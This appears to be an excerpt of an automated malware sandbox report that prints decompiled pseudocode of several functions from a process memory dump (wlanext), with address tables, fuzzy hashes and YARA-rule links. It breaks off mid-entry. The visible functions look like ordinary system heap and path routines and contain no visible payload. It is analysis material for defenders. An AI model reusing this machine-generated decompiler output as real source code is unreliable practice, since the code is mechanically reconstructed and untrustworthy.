                                  0x03514e03
                                  0x03514e03
                                  0x03514e09
                                  0x03514e0f
                                  0x03514e57
                                  0x00000000
                                  0x00000000
                                  0x03514e1b
                                  0x03514e30
                                  0x03514e5b
                                  0x03514e5b
                                  0x00000000
                                  0x03514e30
                                  0x03514e11
                                  0x03514e11
                                  0x03514e16
                                  0x00000000
                                  0x03514e16
                                  0x03514e01
                                  0x00000000
                                  0x03514e01
                                  0x03514da5
                                  0x03556c6b
                                  0x00000000
                                  0x03514dab
                                  0x03514dab
                                  0x00000000
                                  0x03514dab

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1888154727d8ffd5f2505920f6c5972f6841a4a0d1258fe3468baa09b3ccf25a
                                  • Instruction ID: 965024db65d1dc6084929f97f96952ead68c78606fdb6fd53e02f373d4b12db8
                                  • Opcode Fuzzy Hash: 1888154727d8ffd5f2505920f6c5972f6841a4a0d1258fe3468baa09b3ccf25a
                                  • Instruction Fuzzy Hash: CA41F4B5A403189FEB31DF15EC80F6AB7B9FB45710F08019AE8459B2A1D770ED54CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F8A0A Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E034F8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x35dd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0352B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E034FE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x34c1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03511DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03523C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E034F8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                  0x034f8a0a
                                  0x034f8a1c
                                  0x034f8a23
                                  0x034f8a2e
                                  0x034f8a30
                                  0x034f8a36
                                  0x034f8a3c
                                  0x034f8a3e
                                  0x034f8a4a
                                  0x034f8a52
                                  0x034f8a9c
                                  0x034f8aae
                                  0x034f8a58
                                  0x034f8a5e
                                  0x034f8a6a
                                  0x034f8a6f
                                  0x034f8a75
                                  0x034f8a7d
                                  0x034f8a85
                                  0x034f8a86
                                  0x034f8a89
                                  0x034f8a93
                                  0x034f8a99
                                  0x034f8a9b
                                  0x00000000
                                  0x034f8aaf
                                  0x034f8abe
                                  0x034f8ac3
                                  0x034f8acb
                                  0x034f8ad7
                                  0x034f8ae0
                                  0x034f8af1
                                  0x00000000
                                  0x034f8af1
                                  0x034f8acd
                                  0x034f8ad5
                                  0x034f8afb
                                  0x034f8afd
                                  0x034f8aff
                                  0x034f8b07
                                  0x034f8b22
                                  0x034f8b24
                                  0x034f8b2a
                                  0x034f8b2e
                                  0x034f8b3f
                                  0x034f8b78
                                  0x034f8b41
                                  0x034f8b52
                                  0x034f8b54
                                  0x034f8b5c
                                  0x034f8b74
                                  0x034f8b74
                                  0x034f8b5c
                                  0x034f8b3f
                                  0x034f8b5e
                                  0x034f8b61
                                  0x034f8b64
                                  0x034f8b64
                                  0x034f8b6c
                                  0x034f8b6c
                                  0x034f8b11
                                  0x03549cd5
                                  0x03549cd5
                                  0x034f8b17
                                  0x034f8b1a
                                  0x034f8b1a
                                  0x00000000
                                  0x034f8ad5
                                  0x034f8a89

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e086dbf8604945200d9b687704ff2bff72d66fd22d64bbe5307a0ff8d584bf2b
                                  • Instruction ID: ed31705c6e7fd7bbe5e06c8cb1b7e63b00c0435d568880061837e55ec9e03316
                                  • Opcode Fuzzy Hash: e086dbf8604945200d9b687704ff2bff72d66fd22d64bbe5307a0ff8d584bf2b
                                  • Instruction Fuzzy Hash: 374161B5A003299FDB24CF55D888AAAB7B8FB44300F1842EAE9199F351D7709E81CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035AAA16 Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035AAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E035AABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E035AAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E035AAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0358CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L035077F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03507D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E035A131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0358CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                  0x035aaa1f
                                  0x035aaa21
                                  0x035aaa23
                                  0x035aaa2b
                                  0x035aaa30
                                  0x035aaa36
                                  0x035aaa39
                                  0x035aaa42
                                  0x035aaa75
                                  0x035aaa7a
                                  0x035aaa7c
                                  0x035aaa7c
                                  0x035aaa88
                                  0x035aaa8a
                                  0x035aaa8f
                                  0x035aab02
                                  0x035aab04
                                  0x035aaa99
                                  0x035aaaa8
                                  0x035aaaaf
                                  0x035aaab3
                                  0x035aaacc
                                  0x035aaad1
                                  0x035aaad6
                                  0x035aaae0
                                  0x035aaaf3
                                  0x035aaaf9
                                  0x035aaafe
                                  0x035aaafe
                                  0x035aaaf3
                                  0x035aaad6
                                  0x035aaab3
                                  0x035aab07
                                  0x035aab0a
                                  0x035aab11
                                  0x035aab23
                                  0x035aab13
                                  0x035aab1c
                                  0x035aab1c
                                  0x035aab2b
                                  0x035aab44
                                  0x035aab44
                                  0x035aab51
                                  0x035aab51
                                  0x035aaa44
                                  0x035aaa47
                                  0x035aaa4c
                                  0x00000000
                                  0x00000000
                                  0x035aaa5a
                                  0x035aaa64
                                  0x035aaa72
                                  0x00000000
                                  0x035aaa66
                                  0x035aaa66
                                  0x035aaa68
                                  0x035aaa6a
                                  0x00000000
                                  0x035aaa6a

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction ID: 80432894fda694c3a36a309900789d10957341be92b1e9b0ecc055ce203f2bac
                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction Fuzzy Hash: FC310032B00A496BDB15DB6DD845BAFF7FBFFC4210F09806AE805AB2A1DA709D00D650
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035AFDE2 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E035AFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E035AFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E035B0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03507D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E035A1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E035B2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E035AC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E035ADBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03507D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E035AA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                  0x035afde7
                                  0x035afde8
                                  0x035afdec
                                  0x035afdee
                                  0x035afdf5
                                  0x035afdf7
                                  0x035afdfc
                                  0x035afe19
                                  0x035afe22
                                  0x035afe26
                                  0x035afec6
                                  0x035afecd
                                  0x035afed5
                                  0x035afee7
                                  0x035afed7
                                  0x035afee0
                                  0x035afee0
                                  0x035afeef
                                  0x035aff00
                                  0x035aff02
                                  0x035aff07
                                  0x035aff07
                                  0x00000000
                                  0x035afeef
                                  0x035afe33
                                  0x035afe55
                                  0x035afe59
                                  0x035afe5b
                                  0x035afe5e
                                  0x035afe69
                                  0x035afe6d
                                  0x035afe6d
                                  0x035afe69
                                  0x035afe35
                                  0x035afe41
                                  0x035afe41
                                  0x035afe79
                                  0x035afe8b
                                  0x035afe7b
                                  0x035afe84
                                  0x035afe84
                                  0x035afe93
                                  0x00000000
                                  0x035afea8
                                  0x035afeba
                                  0x00000000
                                  0x035afeba
                                  0x035afdfe
                                  0x035afe01
                                  0x035afe02
                                  0x035afe08
                                  0x035aff0c
                                  0x035aff14
                                  0x035aff14

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction ID: c6fce5796ce8c69d3e8a3bb0b5b4c34c9965cfb744745c78f5d0eb1fd4d44652
                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction Fuzzy Hash: F7310336200A41AFD322DB6CEC44F6EBBE9FBC5240F1C4458E8868B762DA75D841D720
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035AEA55 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E035AEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03502280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E035AE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E034EF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E034FFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E035AAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E035ABCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03507D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0359FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E034FFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E035AA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                  0x035aea55
                                  0x035aea66
                                  0x035aea68
                                  0x035aea6c
                                  0x035aea6f
                                  0x035aea72
                                  0x035aea75
                                  0x035aea7a
                                  0x035aea7a
                                  0x035aea7e
                                  0x035aea80
                                  0x035aea85
                                  0x035aea8b
                                  0x035aeab5
                                  0x035aeabc
                                  0x035aeabf
                                  0x035aeabf
                                  0x035aeaca
                                  0x035aeace
                                  0x035aead0
                                  0x035aeae4
                                  0x035aeaeb
                                  0x035aeaf0
                                  0x035aeaf5
                                  0x035aeb09
                                  0x035aeb0d
                                  0x035aeb1d
                                  0x035aeb2d
                                  0x035aeb38
                                  0x035aeb3d
                                  0x035aeb41
                                  0x035aeb4a
                                  0x035aeb60
                                  0x035aeb4c
                                  0x035aeb52
                                  0x035aeb59
                                  0x035aeb59
                                  0x035aeb68
                                  0x035aeb71
                                  0x035aeb71
                                  0x035aea8d
                                  0x035aea8f
                                  0x035aea92
                                  0x035aea97
                                  0x035aea97
                                  0x035aea9b
                                  0x035aea9c
                                  0x035aea9e
                                  0x035aeaa6
                                  0x035aeaa6
                                  0x035aeb7e

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction ID: 6b5fa4b1d6372eb4af76df09c8775d90b9e2e2c899bf7030cf5856d9039544b2
                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction Fuzzy Hash: 5C31C336604B069FC719DF28D885A5BB7EAFFC0210F04492EE9528B750DA30E809CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035669A6 Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E035669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x35dd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L034F6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03566BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03529980() >= 0) {
							E03502280(_t56, 0x35d8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x35d8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x35d8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E034EB6F0(0x34cc338, 0x34cc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03529520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E035295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E034FFFB0(_t68, _t77, 0x35d8778);
				}
				_pop(_t78);
				return E0352B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                  0x035669b5
                                  0x035669be
                                  0x035669c3
                                  0x035669c9
                                  0x035669cc
                                  0x035669d1
                                  0x035669d3
                                  0x035669de
                                  0x035669e1
                                  0x035669ea
                                  0x035669f6
                                  0x035669fe
                                  0x03566a13
                                  0x03566a14
                                  0x03566a15
                                  0x03566a16
                                  0x03566a1e
                                  0x03566a26
                                  0x03566a31
                                  0x03566a36
                                  0x03566a37
                                  0x03566a40
                                  0x03566a49
                                  0x03566a4a
                                  0x03566a53
                                  0x03566a59
                                  0x03566a5d
                                  0x03566a5e
                                  0x03566a64
                                  0x03566a67
                                  0x03566a6a
                                  0x03566a6d
                                  0x03566a70
                                  0x03566a77
                                  0x03566a7d
                                  0x03566a86
                                  0x03566a89
                                  0x03566a9c
                                  0x03566a9f
                                  0x03566aa2
                                  0x03566aa5
                                  0x03566aaf
                                  0x03566ab1
                                  0x03566ab8
                                  0x03566ab9
                                  0x03566abb
                                  0x03566abe
                                  0x03566ac5
                                  0x03566ac5
                                  0x03566aaf
                                  0x03566a40
                                  0x03566a26
                                  0x035669fe
                                  0x03566ace
                                  0x03566ad0
                                  0x03566ad3
                                  0x03566ad8
                                  0x03566adf
                                  0x03566adf
                                  0x03566ae8
                                  0x03566aef
                                  0x03566aef
                                  0x03566af9
                                  0x03566b06

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 994971f71bbbe28d041fdb3d280a4f3379c1711babdb18c559611cb7e4a517f3
                                  • Instruction ID: 94a5f3e0758939a87bfcc95cdc18ffd8b3bf2dad4a9277f665d4a7f3d16b3260
                                  • Opcode Fuzzy Hash: 994971f71bbbe28d041fdb3d280a4f3379c1711babdb18c559611cb7e4a517f3
                                  • Instruction Fuzzy Hash: EB417CB5E013199FDB20DFA5E940BEEBBF4FF48714F18812AE914A7260DB719905CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E5210 Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E034E5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E034E52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E035295D0();
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E034FEB70(_t54, 0x35d79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E035295D0();
								L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E034FEB70(_t54, 0x35d79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0352F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E034FEB70(_t54, 0x35d79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E035295D0();
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                  0x034e5220
                                  0x034e5224
                                  0x03540d13
                                  0x03540d16
                                  0x03540d19
                                  0x034e522a
                                  0x034e522a
                                  0x034e522d
                                  0x034e522d
                                  0x034e5231
                                  0x034e5235
                                  0x034e5239
                                  0x03540d5c
                                  0x03540d62
                                  0x00000000
                                  0x00000000
                                  0x03540d6a
                                  0x03540d7b
                                  0x03540d7f
                                  0x03540d81
                                  0x03540d84
                                  0x03540d95
                                  0x03540d95
                                  0x03540d6c
                                  0x03540d71
                                  0x03540d71
                                  0x03540d9a
                                  0x00000000
                                  0x034e524a
                                  0x034e524a
                                  0x034e5250
                                  0x03540d24
                                  0x03540d35
                                  0x03540d39
                                  0x03540d3b
                                  0x03540d3e
                                  0x03540d50
                                  0x03540d50
                                  0x03540d26
                                  0x03540d2b
                                  0x03540d2b
                                  0x00000000
                                  0x03540d55
                                  0x034e5256
                                  0x034e525b
                                  0x034e5265
                                  0x03540da7
                                  0x034e526b
                                  0x034e526e
                                  0x034e5272
                                  0x03540db1
                                  0x03540db4
                                  0x03540dc5
                                  0x03540dc5
                                  0x034e5272
                                  0x034e5278
                                  0x034e527e
                                  0x034e528a
                                  0x034e528c
                                  0x034e528d
                                  0x00000000
                                  0x034e5280
                                  0x034e5282
                                  0x034e5288
                                  0x034e529f
                                  0x034e5292
                                  0x00000000
                                  0x034e5292
                                  0x00000000
                                  0x034e5288
                                  0x034e527e

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
